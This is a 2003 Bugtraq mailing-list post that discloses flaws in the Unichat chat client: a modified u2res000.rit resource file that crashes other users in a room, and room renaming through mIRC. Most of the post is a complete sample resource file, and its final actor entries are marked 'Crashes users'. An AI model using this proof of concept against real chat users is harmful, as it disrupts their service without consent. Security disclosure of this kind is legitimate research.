|
Bugtraq
mailing list archives
Unichat Vulnerabilities
From: DarkKnight <mbuzz04 () yahoo com>
Date: 2 Nov 2003 05:58:11 -0000
Author: DarkKnight
My site: http://www.insecureonline.com
Product: Unichat
Vendor Info.: Did not respond
//Quote// "Come here," said the Spider to the Fly.
Respected (Just a few):
-------------------
http://securityfocus.com
http://eeye.com
http://packetstormsecurity.nl
http://jinxhackwear.com
http://mod-x.com
-------------------
A program called Unichat suffers from many problems. Firstly, let me explain what Unichat basically is. Unichat is an
animated chatting program that has many IRC characteristics.
Unichat's main problem is its inabilitiy to handle characters (not letters) correctly. If an attacker was to add
additional characters to the application, which can be done through modifying u2res000.rit, all the user's applications
in whichever chatroom the attacker visits, would crash.
Fix for Above: Add more characters to your u2res000.rit to prevent crashing...the more you add, the slower your Unichat
may be (especially on the character select screen, which is why you should modify the registry to select the
characters).
Remember how I said that Unichat has many IRC characteristics? Well, if someone were to sign on the Unichat server with
mIRC, they would be able to change the topic, or in this case, the room name of any room desired, the exception being
rooms with weird alt characters in it. Why is this? All Unichat rooms automatically do not have "Only ops set Topic"
set. (Note: To get a list of rooms, use the command "/names", it wont show up in "/list". Each room is prefixed with
"%#" instead of "#".)
Many more vulnerabilities exist, but the ones I listed are the main ones. I'm not sure if you would call being able to
change room names a vulnerability because of how you go about doing it, but I listed it anyways.
##########################################
##### Sample Character Drop Code #####
##### Open u2res000.rit with notepad #####
##### Replace code with below #####
##### - DarkKnight #####
##########################################
// Author: DarkKnight
// WebSite: http://www.insecureonline.com
// Comments: This vulnerability is old, many now know of it.
// Vendor: http://www.unichat.com
; "u2res000.rit"
#VERSION=1.00;
#TIL= // TILE
#
#
{
t00|tcity001=(1,7);
t00|tcity002=(1,5);
t00|tcosm001=(3,7);
t00|tgras001=(1,11);
t00|tgras002=(1,5);
t00|tgras003=(1,2);
t00|tgras004=(1,7);
t00|tgras005=(1,6);
t00|tgras006=(2,7);
t00|tmoun001=(2,10);
t00|tmoun002=(1,13):
t00|troom001=(1,12);
t00|troom002=(1,12);
t00|troom003=(1,11);
t00|troom004=(1,6);
t00|troom005=(1,8);
t00|troom006=(1,11);
t00|troom007=(1,9);
t00|twint001=(1,1);
}
#STT=
{
ca00|cadve001=(10,78);
ca00|cadve006=(23,115);
ca00|cbill001=(32,98);
ca00|ccast002=(106,114);
ca00|ccasw001=(22,30);
ca00|ccasw002=(24,31);
ca00|ccasw003=(8,40);
ca00|ccasw004=(8,40);
ca00|ccasw005=(22,30);
ca00|ccasw006=(24,31);
ca00|ccasw007=(8,40);
ca00|ccasw008=(7,40);
ca00|cceme102=(35,58);
ca00|cceme103=(11,66);
ca00|cceme105=(15,75);
ca00|cceme107=(30,80);
ca00|cceme108=(15,75);
ca00|cceme110=(35,58);
ca00|cceme601=(8,28);
ca00|cceme603=(8,19);
ca00|cceme604=(19,23);
ca00|cceme606=(12,16);
ca00|cceme608=(11,15);
ca00|cceme610=(12,14);
ca00|cceme612=(9,27);
ca00|cceme614=(20,21);
ca00|cceme615=(8,20);
ca00|cceme702=(14,17);
ca00|cceme705=(10,32);
ca00|cceme706=(23,23);
ca00|cceme707=(8,23);
ca00|cceme708=(8,22);
ca00|cceme710=(14,17);
ca00|cceme712=(10,32);
ca00|cceme714=(25,25);
ca00|cceme715=(8,22);
ca00|cceme716=(9,22);
ca00|cchan001=(23,76);
ca00|cchan002=(44,14);
ca00|ccrem001=(125,112);
cd00|cdwwa001=(18,59);
cd00|cdwwa002=(31,99);
cd00|cdwwa003=(29,99);
cd00|cdwwa004=(31,99);
cd00|cdwwa005=(31,99);
cd00|cdwwa006=(31,99);
cd00|cdwwa007=(31,99);
cd00|cdwwa008=(31,99);
cd00|cdwwa009=(31,99);
cd00|ceast001=(8,44);
cd00|ceast002=(15,49);
cd00|ceast003=(8,46);
cd00|ceast004=(9,47);
cd00|ceast006=(11,51);
cd00|ceast007=(10,43);
cd00|ceast009=(15,38);
cd00|ceast011=(8,47);
cd00|ceast015=(30,89);
cd00|ceast017=(12,63);
cd00|ceast018=(12,56);
cd00|ceast020=(15,83);
cd00|ceast024=(15,83);
cd00|cfurn001=(48,51);
cd00|cfurn004=(28,70);
cd00|cfurn005=(7,26);
cd00|cfurn006=(10,24);
cd00|cfurn007=(10,24);
cd00|cfurn008=(10,24);
cd00|cfurn012=(32,34);
cd00|cfurn013=(32,34);
cd00|cfurn014=(32,34);
cd00|cfurn015=(28,36);
cd00|cfurn016=(28,36);
cd00|cfurn017=(28,36);
cd00|cfurn018=(13,28);
cd00|cfurn019=(13,28);
cd00|cfurn020=(13,28);
cd00|cfurn021=(13,33);
cd00|cfurn022=(13,33);
cd00|cfurn023=(13,33);
cd00|cfurn024=(13,25);
cd00|cfurn025=(13,25);
cd00|cfurn026=(13,25);
cd00|cfurn027=(31,33);
cd00|cfurn028=(41,39);
cd00|cfurn029=(34,56);
cd00|cfurn030=(16,76);
cd00|cfurn031=(16,76);
cd00|cfurn032=(14,76);
cd00|cfurn033=(14,76);
cd00|cfurn036=(14,75);
cd00|cfurn038=(50,64);
cd00|cfurn039=(37,33);
cd00|cfurn040=(37,33);
cd00|cfurn041=(37,33);
cd00|cfurn042=(20,20);
cd00|cfurn043=(20,20);
cd00|cfurn044=(20,20);
cd00|cfurn045=(16,25);
cd00|cfurn046=(22,31);
cd00|cfurn047=(22,31);
cd00|cfurn048=(22,31);
cd00|cfurn049=(28,58);
cd00|cfurn050=(35,37);
cd00|cfurn051=(21,49);
cd00|cfurn052=(10,36);
cd00|cfurn053=(33,67);
cd00|cfurn054=(10,40);
cd00|cfurn055=(10,40);
cd00|cfurn056=(10,40);
cd00|cfurn057=(10,40);
cd00|cfurn058=(10,40);
cg00|cgras001=(15,17);
cg00|cgras002=(20,19);
cg00|cgras007=(16,26);
cg00|cgras008=(16,23);
cg00|chous002=(60,70);
cg00|chous003=(68,73);
cg00|chous005=(60,70);
cg00|chous006=(68,73);
cg00|chous008=(60,70);
cg00|chous009=(68,73);
cg00|chous010=(62,47);
cg00|chous011=(63,50);
cg00|chous013=(62,47);
cg00|chous014=(63,50);
cg00|chous016=(62,47);
cg00|chous017=(63,50);
cg00|chous020=(61,67);
cg00|chous021=(55,71);
cg00|cnnwa001=(25,103);
cg00|cnnwa002=(13,100);
cg00|cnnwa003=(32,107);
cg00|cnnwa004=(10,96);
cg00|cnnwa005=(30,106);
cg00|cnnwa006=(29,105);
cg00|cnnwa007=(33,105);
cg00|cnnwa008=(12,97);
cg00|cnnwa009=(27,105);
cg00|cnnwa010=(28,106);
cg00|cnnwa011=(28,110);
cg00|cnnwa012=(24,103);
cg00|cnnwa013=(26,112);
cg00|cnnwa014=(12,99);
cg00|cnnwa015=(25,105);
cg00|cnnwa016=(26,104);
cg00|cpark001=(37,53);
cg00|cpark002=(29,19);
cg00|cpark003=(33,22);
cg00|cpark004=(14,29);
cg00|cpark005=(14,30);
cg00|cpark006=(6,25);
cg00|cpark007=(19,24);
cg00|cpark008=(24,20);
cg00|cpark009=(29,42);
cg00|cpark010=(23,42);
cg00|cpark011=(7,15);
cg00|cpark012=(10,20);
cg00|cpark013=(7,70);
cg00|cpark014=(50,63);
cg00|cpark015=(35,78);
cs00|cshad001=(24,0);
cs00|cshad002=(32,0);
cs00|cshad003=(26,0);
cs00|cshad004=(7,0);
cs00|cshad005=(12,0);
cs00|csign001=(7,81);
cs00|csign002=(7,75);
cs00|csign003=(40,84);
cs00|csign004=(41,77);
cs00|cston001=(17,67);
cs00|cston002=(10,50);
cs00|cston003=(6,31);
cs00|cston004=(15,15);
cs00|cston005=(10,10);
cs00|cston006=(14,56);
cs00|cston007=(6,7);
cs00|cston008=(27,51);
cs00|cston009=(37,48);
cs00|cston010=(12,10);
cs00|cston011=(19,12);
cs00|cston012=(8,52);
cs00|cston013=(20,10);
cs00|cston014=(7,36);
cs00|cston015=(10,49);
cs00|cston016=(24,68);
cs00|cston017=(27,64);
cs00|cston018=(31,59);
cs00|cston019=(27,61);
cs00|cston020=(5,6);
cs00|ctran001=(7,50);
cs00|ctran002=(7,52);
cs00|ctran003=(7,52);
cs00|ctran004=(7,48);
cs00|ctran005=(7,50);
cs00|ctran006=(9,50);
cs00|ctran008=(9,49);
cs00|ctran009=(8,47);
cs00|ctran010=(10,48);
cs00|ctran011=(29,24);
cs00|ctran012=(24,21);
cs00|ctran013=(23,19);
cs00|ctran014=(27,24);
cs00|ctran015=(28,24);
cs00|ctran016=(24,21);
cs00|ctran017=(24,21);
cs00|ctran018=(27,25);
cs00|ctran019=(33,26);
cs00|ctran020=(24,25);
cs00|ctran021=(23,26);
cs00|ctran022=(32,28);
cs00|ctran023=(33,27);
cs00|ctran024=(27,25);
cs00|ctran025=(27,25);
cs00|ctran026=(33,27);
cs00|ctree001=(10,10);
cs00|ctree002=(10,11);
cs00|ctree003=(10,10);
cs00|ctree004=(9,11);
cs00|ctree005=(12,17);
cs00|ctree006=(15,21);
cs00|ctree007=(20,28);
cs00|ctree008=(22,64);
cs00|ctree009=(29,83);
cs00|ctree011=(14,46);
cs00|ctree012=(18,58);
cs00|ctree013=(21,66);
cs00|ctree014=(28,87);
cs00|ctree016=(12,37);
cs00|ctree017=(16,48);
cs00|ctree019=(23,69);
cs00|ctree020=(5,21);
cs00|ctree021=(9,33);
cs00|ctree022=(12,50);
cs00|ctree023=(13,58);
cs00|ctree024=(24,65);
cs00|ctree026=(22,68);
cs00|ctree028=(33,87);
cs00|ctree029=(25,70);
cs00|ctree031=(33,87);
cs00|ctree032=(28,71);
cs00|ctree033=(10,11);
cw00|cwall001=(34,99);
cw00|cwall002=(34,99);
cw00|cwall003=(29,100);
cw00|cwall004=(30,98);
cw00|cwall005=(30,98);
cw00|cwall006=(30,98);
cw00|cwall007=(30,98);
cw00|cwall008=(21,95);
cw00|cwall009=(17,58);
cw00|cwall010=(33,91);
cw00|cwall011=(27,58);
cw00|cwall012=(13,66);
cw00|cwall013=(34,91);
cw00|cwall014=(30,60);
cw00|cwall015=(13,66);
cw00|cwall016=(32,91);
cw00|cwall017=(28,58);
cw00|cwall018=(13,66);
cw00|cwall019=(37,90);
cw00|cwall020=(37,62);
cw00|cwall021=(36,90);
cw00|cwall022=(34,59);
cw00|cwall023=(36,91);
cw00|cwall024=(37,59);
cw00|cwall025=(26,121);
cw00|cwall026=(26,121);
cw00|cwall027=(26,121);
cw00|cwall028=(26,121);
cw00|cwall029=(26,121);
cw00|cwall030=(26,121);
cw00|cwall031=(10,115);
cw00|cwall032=(10,115);
cw00|cwint001=(14,66);
cw00|cwint002=(14,18);
cw00|cwint003=(20,18);
cw00|cwint004=(15,39);
cw00|cwint005=(9,13);
cw00|cwint006=(18,23);
cw00|cwint007=(4,3);
cw00|cwint008=(5,5);
cw00|cwint009=(15,39);
cw00|cwint010=(15,60);
cw00|cwint011=(15,60);
cw00|cwint012=(5,8);
cw00|cwint013=(5,7);
cw00|cwint014=(28,0);
cw00|cwint015=(5,3);
cw00|cwash001=(38,27);
cw00|cwash002=(72,32);
cw00|cwash003=(30,0);
cw00|cwash004=(44,48);
}
#ANI=
{
cw00|iadve001=(3,1),(110,0);
ad_tile_02=(1,4),(1,46);
cw00|iadve003=(1,4),(64,32);
cw00|iarro001=(5,1),(5,0);
cw00|ieast001=(7,1),(12,45);
cw00|ifann001=(3,1),(26,92);
cw00|ifann002=(3,1),(36,15);
cw00|ifire001=(3,1),(10,37);
cw00|ifire003=(3,1),(10,30);
cw00|igras001=(2,1),(7,7);
cw00|ircha001=(3,1),(20,36);
cw00|ircha002=(3,1),(20,23);
cw00|ircha005=(3,1),(20,36);
cw00|ircha006=(3,1),(20,23);
cw00|iston001=(3,1),(27,64);
cw00|itile001=(1,4),(32,0);
cw00|itona001=(3,1),(12,32);
cw00|iwate002=(2,1),(16,8);
cw00|iwate003=(2,1),(32,16);
cw00|wroom001=(1,17),(34,8);
cw01|iadve004=(2,1),(1,46);
}
{
a00|aman_001=(11,4),(23,45);
a00|aman_002=(11,4),(23,45);
a00|aman_003=(11,4),(23,45);
a00|aman_004=(11,4),(23,45);
a00|aman_005=(11,4),(23,45);
a00|aman_006=(11,4),(23,45);
a00|aman_007=(11,4),(23,45);
a00|aman_008=(11,4),(23,45);
a00|aman_009=(11,4),(23,45);
a00|aman_010=(11,4),(23,45);
a00|awman001=(11,4),(23,45);
a00|awman002=(11,4),(23,45);
a00|awman003=(11,4),(23,45);
a00|awman004=(11,4),(23,45);
a00|awman005=(11,4),(23,45);
a00|awman006=(11,4),(23,45);
a00|awman007=(11,4),(23,45);
a00|awman008=(11,4),(23,45);
cs00|ctree019=(11,4),(23,45);
}
#WAV=
{
sagry000;
schng000;
schng001;
schng002;
sclos000;
scrys000;
sembr000;
sembr001;
shit_000;
shit_001;
shit_002;
shit_003;
sjpdn000;
sjpdn001;
sjpup000;
sjpup001;
skiss000;
spick000;
ssexy000;
sstep000;
ssurp000;
stemp000;
stemp001;
stemp002;
stemp003;
stran000;
sturn000;
sturn001;
}
#MID=
{
mjazz000; 0
mjazz001; 1
mjazz002; 2
mjazz003; 3
mjazz004; 4
mjazz005; 5
mjazz006; 6
mcvtn000; 7
mdrmo000; 8
mfanf000; 9
mintr000; 10
mintr001; 11
mjopl000; 12
mmidi000; 13
mmidi001; 14
mmore000; 15
mmzrt000; 16
mrach000; 17
msadd000; 18
mstrs000; 19
msusp000; 20
mumch000; 21
mxmas000; 22
}
#STAGE=
{
0000csin;
0001ctrm;
blackroom;
0002ctrm;
0003ctrm;
0004ctrm;
0005ctrm;
preview;
0000casa;
0000casb;
0000cemt;
0000east;
0000haus;
0000park;
0000spac;
0000ston;
0000strt;
0000wash;
0000wint;
0001demo;
0002demo;
0003demo;
0010casa;
0010casb;
0010csin;
0010cemt;
0020casa;
0020casb;
0020cemt;
0020csin;
0020haus;
0020park;
0030casa;
0030casb;
0040casa;
1010csin;
1020csin;
2000csin;
2010csin;
2100csin;
2110csin;
2200csin;
2220csin;
3100csin;
3110csin;
3200csin;
3220csin;
4000csin;
4010csin;
}
#SERVERIP=
{
65.104.9.68;
65.104.9.68;
127.0.0.1;
}
#ACTOR=a00|aman_001,Toto,40;
{
STANDF=1,(0,2,20,10);
STANDB=1,(9,2,20,10);
STANDINGF=1,(|0,2,20,10,schng002)(/0,2)(*0,2)(#0,2)(0,2);
STANDINGB=1,(|9,2,20,10,schng002)(/9,2)(*9,2)(#9,2)(9,2);
MORPHF=1,(39,2,20,10);
MORPHB=1,(42,2,20,10);
MORPHINGF=1,(|39,2,20,10,schng000)(/39,2)(*39,2)(#39,2)(39,2);
MORPHINGB=1,(|42,2,20,10,schng001)(/42,2)(*42,2)(#42,2)(42,2);
DOZEF=0,(*21,10)(*22,10);
DOZEB=0,(*33,10)(*34,10);
WALKF=1,(1,0,8,4,sstep000)
WALKB=1,(5,0,8,4,sstep000)
UPF=1,(1,0)
UPB=1,(5,0)
DOWNF=1,(1,0)
DOWNB=1,(5,0)
MORPHWALKF=1,(40,0,8,4,sturn000)
MORPHWALKB=1,(42,0,8,4,sturn001)
CHAT=3,(10)(11)(12);
ENTER=1,(|0,3,0,0,sstep000)(/0,3)(*0,3)(#0,3)(0,1);
EXIT=1,(0,3,0,0,sstep000)(#0,3)(*0,3)(/0,3)(|0,3);
SMILE=1,(13,5,0,0,stemp000)(14)(13)(14)(13)(14);
MAD=1,(15,5,0,0,sagry000)(16)(15)(16)(15)(16);
HELLO=1,(17,10)(18);
CRY=1,(19,5,0,0,scrys000)(20)(19)(20)(19)(20);
SCRATCH=1,(23,3,0,0,stemp001)(24,2)(23,3)(24,2);
PICK=1,(29,10,0,0,spick000);
SPECIAL=1,(30,5,0,0,stemp000)(31)(32)(*32)(32)(31)(32);
WIGGLEB=2,(33)(34);
PUNCHF=3,(25,5,0,0,shit_000)(26);
PUNCHB=3,(37,5,0,0,shit_002)(38);
BEATENF=3,(25,5,0,0,shit_000)(26);;
BEATENB=3,(37,5,0,0,shit_002)(38);
}
#ACTOR=a00|aman_002, BatBoi,40;
{
MORPHWALKF=1,(1,0,8,4,sturn000)
MORPHWALKB=1,(5,0,8,4,sturn001)
SPECIAL=1,(30,5,0,0,stemp000)(31)(32)(31)(32);
}
#ACTOR=a00|aman_003, Gull,40;{}
#ACTOR=a00|aman_004, Dino,40;{}
#ACTOR=a00|aman_005, Bongun,40;{}
#ACTOR=a00|aman_006, DarkKnight,40;{}
#ACTOR=a00|aman_007, Board,40;{}
#ACTOR=a00|aman_008, Richard,40;{}
#ACTOR=a00|aman_009, Hook,40;{}
#ACTOR=a00|aman_010, Dalgong,40;{}
#ACTOR=a00|awman001, Cutie,40;{}
#ACTOR=a00|awman002, Dollie,40;{}
#ACTOR=a00|awman003, Foxie,40;{}
#ACTOR=a00|awman004, Sian,40;{}
#ACTOR=a00|awman005, Sharon,40;{}
#ACTOR=a00|awman006, Mingming,40;{}
#ACTOR=a00|awman007, Robo,40;{}
#ACTOR=a00|awman008, Uni,40;{}
#ACTOR=a00|awman008, DarkKnight,40;{} //Crashes users
#ACTOR=a00|awman008, DarkKnight2,40;{} //Crashes users
 By Date 
By Thread
Current thread:
- Unichat Vulnerabilities DarkKnight (Nov 03)
|
Intro
